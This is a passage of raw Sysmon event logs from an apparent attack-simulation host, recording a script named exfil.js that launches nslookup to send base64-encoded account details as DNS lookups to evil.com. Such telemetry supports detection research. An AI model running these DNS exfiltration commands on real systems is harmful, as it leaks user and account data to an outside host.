14:16:33.717{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B740-000000005F02}6848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.717{2E1864BB-17C1-629A-B740-000000005F02}6848708C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B640-000000005F02}7896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.717{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B740-000000005F02}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.696{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B640-000000005F02}7896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.696{2E1864BB-17A1-629A-783D-000000005F02}55527284C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-B640-000000005F02}7896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.711{2E1864BB-17C1-629A-B640-000000005F02}7896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsidgc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.696{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlobyu.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.680{2E1864BB-17C1-629A-B440-000000005F02}60447852C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B540-000000005F02}6712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.680{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.665{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B540-000000005F02}6712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.665{2E1864BB-17C1-629A-B340-000000005F02}61767824C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-B540-000000005F02}6712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.679{2E1864BB-17C1-629A-B540-000000005F02}6712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-B340-000000005F02}6176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlobyu.tmp 2>&1 10341000x8000000000000000201079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.649{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B440-000000005F02}6044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.649{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B440-000000005F02}6044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.649{2E1864BB-17C1-629A-B440-000000005F02}60447852C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B340-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B440-000000005F02}6044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B340-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.633{2E1864BB-17A1-629A-783D-000000005F02}55521352C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-B340-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.636{2E1864BB-17C1-629A-B340-000000005F02}6176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlobyu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.618{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldhoq.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.595{2E1864BB-17C1-629A-B140-000000005F02}61486656C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B240-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 